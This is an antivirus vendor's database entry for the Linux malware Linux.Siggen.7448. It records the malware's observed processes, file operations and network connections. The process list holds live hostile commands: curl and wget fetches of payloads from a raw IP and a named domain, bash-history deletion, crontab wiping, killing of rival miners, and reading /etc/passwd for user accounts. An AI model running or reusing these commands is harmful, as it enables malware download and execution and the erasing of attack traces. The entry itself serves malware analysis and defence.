Linux.Siggen.7448
Added to the Dr.Web virus database:
2024-05-13
Virus description added:
2024-05-13
Technical Information
Malicious functions:
Removes itself
Launches processes:
curl -s -L -O 45.88.67.94/network
<SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' "$@" <SAMPLE_FULL_PATH>
rm -rf /root/.bash_history
chmod +x iplist ips iptemp retea
grep -v false
cat .usrs
/usr/bin/pgrep pkill haiduc
mkdir /dev/shm/.x
chmod +x network
sed 1d iptemp
grep -v nologin
cat ips
rm -rf xmrig .diicot .black Opera
curl -O -s -L arhivehaceru.com/payload
rm -rf /dev/shm/retea /dev/shm/.magic
wget -q 45.88.67.94/network
uniq
chmod +x .teaca
/usr/bin/pgrep pkill Opera
crontab -r
/usr/bin/pgrep pkill xMEu
grep -v sync
sleep 3
rm -rf .black xmrig.1
grep 192.168
rm -rf retea ips iptemp ips iplist
/usr/bin/pgrep pkill java
rm -rf .retea
rm -rf pass
cut -d: -f1
/usr/bin/pgrep pkill xrx
/usr/bin/mawk awk -F. {print $1"."$2}
wget -q arhivehaceru.com/payload
/usr/bin/pgrep pkill blacku
/usr/bin/pgrep pkill xmrig
/usr/bin/mawk awk {print $1}
cat retea
mkdir /tmp/.tmp
wget -q 45.88.67.94/ps
<0x2f>
rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp
curl -s -L -O 45.88.67.94/ps
grep 10.
rm -rf /dev/shm/.x /root/retea iplist ips iptemp pass retea <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /root/stub.sh
grep -v halt
cat /etc/passwd
ip r
grep -v shutdown
rm -rf .bash_history /root/.bash_history
/usr/bin/pgrep pkill cnrig
chmod +x payload systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
grep -c . .usrs
grep 172.
sleep 1
chmod +x ps
Performs operations with the file system:
Modifies file access rights:
/var/tmp/payload
/var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi
/var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
/dev/shm/.x/iplist
/dev/shm/.x/ips
/dev/shm/.x/iptemp
/dev/shm/.x/retea
Creates folders:
Deletes folders:
Creates or modifies files:
/var/tmp/payload
/dev/shm/.x/retea
/dev/shm/.x/ips
/dev/shm/.x/iptemp
/dev/shm/.x/iplist
/dev/shm/.x/.usrs
/dev/shm/.x/pass
Deletes files:
/root/.bash_history
/.x/pass
/.x/.usrs
/.x/iplist
/.x/iptemp
/.x/ips
/.x/retea
/root/run.sh
/root/stub.sh
Network activity:
Establishes connection:
8.#.8.8:53
12#.##.94.177:80
45.##.67.94:80
DNS ASK:
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects OS information
Collects CPU information
Curing recommendations
Linux